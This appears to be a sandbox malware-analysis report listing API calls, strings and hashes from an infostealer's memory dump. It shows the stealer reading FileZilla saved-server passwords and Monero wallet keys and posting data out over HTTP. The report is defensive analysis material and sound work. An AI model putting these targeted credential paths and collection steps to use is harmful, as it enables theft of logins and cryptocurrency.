lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0275ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0275ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0275EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0275EDB1
lstrcat.KERNEL32(?,url: ), ref: 0275EDC0
lstrcat.KERNEL32(?,00000000), ref: 0275EDD3
lstrcat.KERNEL32(?,0276DD34), ref: 0275EDE2
lstrcat.KERNEL32(?,00000000), ref: 0275EDF5
lstrcat.KERNEL32(?,0276DD38), ref: 0275EE04
lstrcat.KERNEL32(?,login: ), ref: 0275EE13
lstrcat.KERNEL32(?,00000000), ref: 0275EE26
lstrcat.KERNEL32(?,0276DD44), ref: 0275EE35
lstrcat.KERNEL32(?,password: ), ref: 0275EE44
lstrcat.KERNEL32(?,00000000), ref: 0275EE57
lstrcat.KERNEL32(?,0276DD54), ref: 0275EE66
lstrcat.KERNEL32(?,0276DD58), ref: 0275EE75
strtok_s.MSVCRT ref: 0275EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0276D772), ref: 0275EECE
memset.MSVCRT ref: 0275EF17

Strings

password: , xrefs: 0275EE3B
<Pass encoding="base64">, xrefs: 0275EC9A
<User>, xrefs: 0275EC50
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0275EAE4
login: , xrefs: 0275EE0A
url: , xrefs: 0275EDB7
profile: null, xrefs: 0275EDA8
browser: FileZilla, xrefs: 0275ED99
<Port>, xrefs: 0275EC06
<Host>, xrefs: 0275EBBC

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 2108362335-555421843
Opcode ID: dfc20120a899bb8b24d74d3a84f10ebcec6c177a80a52fef2ca19cd13e23af35
Instruction ID: e46882623da06c130138b6d7c92b5bcd060b810dc040cdc3683c7c937a206095
Opcode Fuzzy Hash: dfc20120a899bb8b24d74d3a84f10ebcec6c177a80a52fef2ca19cd13e23af35
Instruction Fuzzy Hash: D5D11DB1D501089BDB15EBE5DD5DEFEB739AF14340F804918E906A6084EF74AA19CFA0

Function 02765EC0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,02BA40D0), ref: 02765F01
GetProcAddress.KERNEL32(74DD0000,02BA3F48), ref: 02765F1A
GetProcAddress.KERNEL32(74DD0000,02BA3F60), ref: 02765F32
GetProcAddress.KERNEL32(74DD0000,02BA3F78), ref: 02765F4A
GetProcAddress.KERNEL32(74DD0000,02BA3F90), ref: 02765F63
GetProcAddress.KERNEL32(74DD0000,02BA3FA8), ref: 02765F7B
GetProcAddress.KERNEL32(74DD0000,02BA3FB8), ref: 02765F93
GetProcAddress.KERNEL32(74DD0000,02BA4348), ref: 02765FAC
GetProcAddress.KERNEL32(74DD0000,02BA4368), ref: 02765FC4
GetProcAddress.KERNEL32(74DD0000,02BA4380), ref: 02765FDC
GetProcAddress.KERNEL32(74DD0000,02BA4398), ref: 02765FF5
GetProcAddress.KERNEL32(74DD0000,02BA04B0), ref: 0276600D
GetProcAddress.KERNEL32(74DD0000,02BA04C8), ref: 02766025
GetProcAddress.KERNEL32(74DD0000,02BA7308), ref: 0276603E
GetProcAddress.KERNEL32(74DD0000,02BA7368), ref: 02766056
GetProcAddress.KERNEL32(74DD0000,02BA04E8), ref: 0276606E
GetProcAddress.KERNEL32(74DD0000,02BA73F8), ref: 02766087
GetProcAddress.KERNEL32(74DD0000,02BA7488), ref: 0276609F
GetProcAddress.KERNEL32(74DD0000,02BA0508), ref: 027660B7
GetProcAddress.KERNEL32(74DD0000,02BA7428), ref: 027660D0
GetProcAddress.KERNEL32(74DD0000,02BA0528), ref: 027660E8
LoadLibraryA.KERNEL32(02BA7398,?,027636B0), ref: 027660FA
LoadLibraryA.KERNEL32(02BA74D0,?,027636B0), ref: 0276610B
LoadLibraryA.KERNEL32(02BA7410,?,027636B0), ref: 0276611D
LoadLibraryA.KERNEL32(02BA7320,?,027636B0), ref: 0276612F
LoadLibraryA.KERNEL32(02BA74A0,?,027636B0), ref: 02766140
GetProcAddress.KERNEL32(75A70000,02BA7338), ref: 02766162
GetProcAddress.KERNEL32(75290000,02BA7350), ref: 02766183
GetProcAddress.KERNEL32(75290000,02BA7458), ref: 0276619B
GetProcAddress.KERNEL32(75BD0000,02BA7470), ref: 027661BD
GetProcAddress.KERNEL32(75450000,02BA0548), ref: 027661DE
GetProcAddress.KERNEL32(76E90000,02BA0568), ref: 027661FF
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 02766216

Strings

NtQueryInformationProcess, xrefs: 0276620A

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: bd99e418262a94c88af9ba0d2f2fa7de95b35bb558472b1a58434978714b5df6
Instruction ID: 3fc4fb76f1e4b5085ef41bbc9400b2bdd6793dc71c338da783dc312686135288
Opcode Fuzzy Hash: bd99e418262a94c88af9ba0d2f2fa7de95b35bb558472b1a58434978714b5df6
Instruction Fuzzy Hash: 39A1C8B5E9C200EFC784DFA8F989A3637B9BB8C3117426D28E609C7252D7759468CF50

Function 02754DC0 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 02754470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 027544F6
Part of subcall function 02754470: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754506

lstrlen.KERNEL32(00000000), ref: 02754E4A

Part of subcall function 02765590: CryptBinaryToStringA.CRYPT32(00000000,02754E3E,40000001,00000000,00000000), ref: 027655B0

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754EBB
StrCmpCA.SHLWAPI(?,02BB5868), ref: 02754ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02754FF4
HttpOpenRequestA.WININET(00000000,02BB5818,?,02BB6370,00000000,00000000,00400100,00000000), ref: 02755058

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,02BB5878,00000000,?,02BA9880,00000000,?,0276E098,00000000,?,02760996), ref: 027553EB
lstrlen.KERNEL32(00000000), ref: 027553FF
GetProcessHeap.KERNEL32(00000000,?), ref: 02755410
RtlAllocateHeap.NTDLL(00000000), ref: 02755417
lstrlen.KERNEL32(00000000), ref: 0275542C
memcpy.MSVCRT ref: 02755443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0275545D
memcpy.MSVCRT ref: 0275546A
lstrlen.KERNEL32(00000000), ref: 0275547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02755495
memcpy.MSVCRT ref: 027554A5
lstrlen.KERNEL32(00000000,?,?), ref: 027554C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 027554D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02755501
InternetCloseHandle.WININET(00000000), ref: 02755565
InternetCloseHandle.WININET(00000000), ref: 02755572
InternetCloseHandle.WININET(00000000), ref: 0275557C

Strings

------, xrefs: 0275506B
--, xrefs: 02754F34
------, xrefs: 027552EF
", xrefs: 02755278
", xrefs: 02755136
", xrefs: 027553BA
------, xrefs: 02754F4B
------, xrefs: 027551AD

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1133489818-2774362122
Opcode ID: 2c9af8528fd0cdc0e5a929f231e16ab047b72b01c5ad97110e1ba29887ce326a
Instruction ID: 1e42f289c56782908d2e996924480daef8f5856a92e95dbad906bd737466aa55
Opcode Fuzzy Hash: 2c9af8528fd0cdc0e5a929f231e16ab047b72b01c5ad97110e1ba29887ce326a
Instruction Fuzzy Hash: C632F172960118ABDB16EBA1DC5CFFEB37EBF54700F804569A50663091EF746A48CFA0

Function 0275A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02767060: StrCmpCA.SHLWAPI(00000000,0276DBD0,0275C8F2,0276DBD0,00000000), ref: 0276707F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0275A362
RtlAllocateHeap.NTDLL(00000000), ref: 0275A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0275A14A

Part of subcall function 02766E10: lstrlen.KERNEL32(00000000,?,?,02762BE0,0276D59B,0276D59A,?,?,027637C6,00000000,?,02BA0578,?,0276D8AC,?,00000000), ref: 02766E1B
Part of subcall function 02766E10: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766E75

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

lstrcat.KERNEL32(?,00000000), ref: 0275A4AA
lstrcat.KERNEL32(?,0276DA80), ref: 0275A4B9
lstrcat.KERNEL32(?,00000000), ref: 0275A4CC
lstrcat.KERNEL32(?,0276DA84), ref: 0275A4DB
lstrcat.KERNEL32(?,00000000), ref: 0275A4EE
lstrcat.KERNEL32(?,0276DA88), ref: 0275A4FD
lstrcat.KERNEL32(?,00000000), ref: 0275A510
lstrcat.KERNEL32(?,0276DA8C), ref: 0275A51F
lstrcat.KERNEL32(?,00000000), ref: 0275A532
lstrcat.KERNEL32(?,0276DA90), ref: 0275A541
lstrcat.KERNEL32(?,00000000), ref: 0275A554
lstrcat.KERNEL32(?,0276DA94), ref: 0275A563

Part of subcall function 027597F0: memcmp.MSVCRT ref: 0275980B
Part of subcall function 027597F0: memset.MSVCRT ref: 0275983E
Part of subcall function 027597F0: LocalAlloc.KERNEL32(00000040,?), ref: 0275988E

lstrcat.KERNEL32(?,00000000), ref: 0275A5AC
lstrcat.KERNEL32(?,0276DA98), ref: 0275A5C6
lstrlen.KERNEL32(?), ref: 0275A605
lstrlen.KERNEL32(?), ref: 0275A614
memset.MSVCRT ref: 0275A65D

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

DeleteFileA.KERNEL32(00000000), ref: 0275A689

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 43fb9eff4977fcfc1df00c09e68ba12c0ad14154cacc43bfecc3226164773069
Instruction ID: 9234f60ca5c81beff6f188b7d2f9e9d8268979be17ab819811fb7c761dbc4ac7
Opcode Fuzzy Hash: 43fb9eff4977fcfc1df00c09e68ba12c0ad14154cacc43bfecc3226164773069
Instruction Fuzzy Hash: EF022DB19541189BCB19EBA1DD5CEFEB33EAF14340F804568A90667090DF75AE18CFA0

Function 0275C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 02765250: GetSystemTime.KERNEL32(?,02BA97F0,0276D129,?,?,?,?,?,?,?,?,?,02754623,?,00000014), ref: 02765276

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0275C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0275C817
RtlAllocateHeap.NTDLL(00000000), ref: 0275C81E
lstrcat.KERNEL32(?,00000000), ref: 0275C958
lstrcat.KERNEL32(?,0276DBD8), ref: 0275C967
lstrcat.KERNEL32(?,00000000), ref: 0275C97A
lstrcat.KERNEL32(?,0276DBDC), ref: 0275C989
lstrcat.KERNEL32(?,00000000), ref: 0275C99C
lstrcat.KERNEL32(?,0276DBE0), ref: 0275C9AB
lstrcat.KERNEL32(?,00000000), ref: 0275C9BE
lstrcat.KERNEL32(?,0276DBE4), ref: 0275C9CD
lstrcat.KERNEL32(?,00000000), ref: 0275C9E0
lstrcat.KERNEL32(?,0276DBE8), ref: 0275C9EF
lstrcat.KERNEL32(?,00000000), ref: 0275CA02
lstrcat.KERNEL32(?,0276DBEC), ref: 0275CA11
lstrcat.KERNEL32(?,00000000), ref: 0275CA24
lstrcat.KERNEL32(?,0276DBF0), ref: 0275CA33

Part of subcall function 02766E10: lstrlen.KERNEL32(00000000,?,?,02762BE0,0276D59B,0276D59A,?,?,027637C6,00000000,?,02BA0578,?,0276D8AC,?,00000000), ref: 02766E1B
Part of subcall function 02766E10: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766E75

lstrlen.KERNEL32(?), ref: 0275CA7A
lstrlen.KERNEL32(?), ref: 0275CA89
memset.MSVCRT ref: 0275CAD2

Part of subcall function 02767060: StrCmpCA.SHLWAPI(00000000,0276DBD0,0275C8F2,0276DBD0,00000000), ref: 0276707F

DeleteFileA.KERNEL32(00000000), ref: 0275CAFE

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 09e0b5cd68b4fc8794ee341b7a43125196a3c70616af74ebd2e55601010fcc90
Instruction ID: c7ad14f6733d8846fbe83da47d959f74a7d872c0c59c9bd6d241fe85b5dce85a
Opcode Fuzzy Hash: 09e0b5cd68b4fc8794ee341b7a43125196a3c70616af74ebd2e55601010fcc90
Instruction Fuzzy Hash: 48E11DB1954108ABCB16EBA1DC5CEFEB33EAF14341F404558E906B7090DF75AA18CFA0

Function 02754540 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 02754470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 027544F6
Part of subcall function 02754470: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754506

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 027545D5
StrCmpCA.SHLWAPI(?,02BB5868), ref: 027545FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0275477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0276D797,00000000,?,?,00000000,?,",00000000,?,02BB5898), ref: 02754AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02754AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02754AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02754B09
InternetCloseHandle.WININET(00000000), ref: 02754B6D
InternetCloseHandle.WININET(00000000), ref: 02754B85
HttpOpenRequestA.WININET(00000000,02BB5818,?,02BB6370,00000000,00000000,00400100,00000000), ref: 027547D5

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

InternetCloseHandle.WININET(00000000), ref: 02754B8F

Strings

", xrefs: 027549F3
------, xrefs: 027547E8
", xrefs: 027548B2
------, xrefs: 02754929
------, xrefs: 0275467D

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 398f511d8e1ed5dc59d9732121106f021009753e329a3a0da557a19899819c9c
Instruction ID: 434b16ee093bedbffa6e0c7e4c2dde9d14c44afac43ecd8246de0ed53a9695d1
Opcode Fuzzy Hash: 398f511d8e1ed5dc59d9732121106f021009753e329a3a0da557a19899819c9c
Instruction Fuzzy Hash: 4D12ED729101189BDB16EB91DC68FFEB77EAF15300F9441A9A90663090EF746F48CFA1

Function 02764AD0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

RegOpenKeyExA.KERNEL32(00000000,02BB3398,00000000,00020019,00000000,0276D289), ref: 02764B31
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 02764BB3
wsprintfA.USER32 ref: 02764BE6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 02764C08
RegCloseKey.ADVAPI32(00000000), ref: 02764C19
RegCloseKey.ADVAPI32(00000000), ref: 02764C26

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Strings

- , xrefs: 02764D30
%s\%s, xrefs: 02764BDA
?, xrefs: 02764B07

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: bf1ad326068e29f45112a2f47fe7f8f47ae2dfdd37393a84f282bd4422b02b5a
Instruction ID: 32188bde1059724bbb757747c0c3f799ca18359547130e71ef60c6339ab89987
Opcode Fuzzy Hash: bf1ad326068e29f45112a2f47fe7f8f47ae2dfdd37393a84f282bd4422b02b5a
Instruction Fuzzy Hash: F971F8729001189BDB69DF65DD98FEA73BDBF48300F408698A509A6140DF746E89CFE0

Function 027512D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 027512E7

Part of subcall function 02751260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 02751274
Part of subcall function 02751260: RtlAllocateHeap.NTDLL(00000000), ref: 0275127B
Part of subcall function 02751260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 02751297
Part of subcall function 02751260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 027512B5
Part of subcall function 02751260: RegCloseKey.ADVAPI32(?), ref: 027512BF

lstrcat.KERNEL32(?,00000000), ref: 0275130F
lstrlen.KERNEL32(?), ref: 0275131C
lstrcat.KERNEL32(?,.keys), ref: 02751337

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 02765250: GetSystemTime.KERNEL32(?,02BA97F0,0276D129,?,?,?,?,?,?,?,?,?,02754623,?,00000014), ref: 02765276

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

CopyFileA.KERNEL32(?,00000000,00000001), ref: 02751425

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 027593A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027593CC
Part of subcall function 027593A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 027593F1
Part of subcall function 027593A0: LocalAlloc.KERNEL32(00000040,?), ref: 02759411
Part of subcall function 027593A0: ReadFile.KERNEL32(000000FF,?,00000000,0275EB27,00000000), ref: 0275943A
Part of subcall function 027593A0: LocalFree.KERNEL32(0275EB27), ref: 02759470
Part of subcall function 027593A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0275947A

DeleteFileA.KERNEL32(00000000), ref: 027514A9
memset.MSVCRT ref: 027514D0

Part of subcall function 02754DC0: lstrlen.KERNEL32(00000000), ref: 02754E4A
Part of subcall function 02754DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754EBB
Part of subcall function 02754DC0: StrCmpCA.SHLWAPI(?,02BB5868), ref: 02754ED9

Strings

wallet_path, xrefs: 027512F0
SOFTWARE\monero-project\monero-core, xrefs: 027512F5
\Monero\wallet.keys, xrefs: 0275134D
.keys, xrefs: 0275132B

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
